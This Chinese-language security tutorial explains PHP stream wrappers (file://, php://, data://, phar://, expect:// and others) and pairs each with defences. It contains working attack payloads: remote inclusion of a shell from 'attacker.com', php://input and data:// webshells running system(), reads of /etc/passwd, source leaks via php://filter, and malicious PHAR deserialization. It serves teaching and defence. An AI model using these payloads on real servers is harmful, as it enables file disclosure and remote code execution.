PHP伪协议详解：网络安全中的利用与防御

PHP伪协议详解：网络安全中的利用与防御

作为网络安全工程师，深入理解PHP伪协议的利用方式对渗透测试和漏洞防御至关重要。以下结合实战案例，逐条解析各协议用法及风险点（环境基于PHP 5.6+，部分协议需特定配置）。

1. file:// – 本地文件访问

作用：直接读取服务器本地文件。
语法：file://[绝对路径]

include('file:///etc/passwd');  // 读取Linux系统用户列表

安全利用：

• 敏感文件泄露：在文件包含漏洞中获取/etc/passwd、/proc/self/environ（环境变量）、网站配置文件（如config.php）。
• 防御：配置open_basedir限制文件访问范围。

2. http:///https:// – 远程资源包含

作用：加载远程URL内容。
语法：http(s)://example.com/shell.txt
安全利用：

• 远程文件包含（RFI）：

  include($_GET['file']);  // 参数?file=http://attacker.com/shell.txt
  

  攻击者托管恶意PHP脚本，服务器下载并执行。
• 防御：关闭allow_url_include（默认关闭）。

3. ftp:// – FTP协议访问

作用：通过FTP读取文件（需认证）。
语法：ftp://user:pass@example.com/file
安全利用：

• SSRF攻击：利用服务器发起FTP请求，探测内网服务（如ftp://192.168.1.1:21）。
• 防御：禁用ftp扩展或防火墙限制外连。

4. php:// – I/O流操作 ⚠️ 高危！

核心子协议：

• php://input：读取原始POST数据

  // 参数：?file=php://input  
  // POST Body: <?php system('id'); ?>
  

  条件：需开启allow_url_include=On。
• php://filter：文件内容编码/过滤

  include('php://filter/convert.base64-encode/resource=config.php');
  

  利用：绕过文件读取限制，获取源码Base64编码。
• php://fd：访问文件描述符（需知fd编号）。

5. zlib:// – 压缩流处理

作用：读取压缩文件（如.gz）。
语法：compress.zlib://file.gz
利用：

• 读取压缩后的日志文件（如access.log.gz），避免直接解析。

6. data:// – 内嵌数据流 ⚠️ 高危！

作用：直接在URL中嵌入数据。
语法：

include('data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+');
// 等价于执行 <?php phpinfo(); ?>

条件：allow_url_include=On。
实战：短指令执行（如data://text/plain,<?= system($_GET[1]);?>）。

7. glob:// – 文件路径匹配

作用：遍历目录（类似glob()函数）。
语法：glob:///var/www/*.php
利用：

• 信息收集：列目录结构（需配合print_r等输出）。

$it = new DirectoryIterator("glob:///var/www/*");
foreach($it as $f) { echo $f."\n"; }

8. phar:// – 归档文件访问 ⚠️ 反序列化漏洞！

作用：读取ZIP/PHAR等归档中的文件。
语法：phar:///path/to/archive.zip/internal/file.php
高危漏洞：

• 反序列化利用：构造恶意PHAR文件触发__destruct()或__wakeup()。

  // 生成恶意PHAR（需写权限）
  $phar = new Phar('exploit.phar');
  $phar->startBuffering();
  $phar->addFromString('test.txt', 'data');
  $phar->setStub('<?php __HALT_COMPILER(); ?>');
  $phar->setMetadata($malicious_object); // 插入恶意对象
  $phar->stopBuffering();
  

  触发：include('phar://exploit.phar');。
  防御：禁用phar扩展或过滤输入。

9. ssh2:// – SSH2协议

作用：通过SSH访问文件（需ssh2扩展）。
语法：ssh2://user:pass@example.com:22/path/to/file
利用：SSRF场景下尝试连接内网SSH服务（较少见）。

10. rar:// – RAR压缩包

作用：读取RAR文件内容（需rar扩展）。
语法：rar:///path.rar#file.txt
利用：结合文件上传漏洞，读取压缩包内敏感文件。

11. ogg:// – 音频流

作用：处理OGG音频（实际利用极少）。
语法：ogg://sound.ogg

12. expect:// – 交互式命令执行 ⚠️ 最高危！

作用：直接执行系统命令（需expect扩展）。
语法：expect://id

file_get_contents('expect://cat /etc/passwd');

防御：永远禁用expect扩展（默认不安装）。

防御策略总结

1. 关键配置：
   • allow_url_fopen=Off – 禁用远程URL访问
   • allow_url_include=Off – 禁用远程/伪协议包含
   • disable_functions=expect – 禁用危险函数
2. 过滤输入：检查include/require参数是否包含://。
3. 最小权限：运行PHP的用户权限应限制（非root）。
4. 扩展管理：卸载不必要的扩展（expect、ssh2）。

实战案例

• CTF文件包含题：
  用php://filter/convert.base64-encode/resource=index.php泄露源码。
• 真实渗透：
  上传图片马（ZIP重命名），通过phar://images/avatar.jpg/shell.php触发反序列化。

掌握这些协议的特性，可在渗透测试中快速识别漏洞，同时加固自身应用安全。建议在测试环境中验证上述案例，加深理解！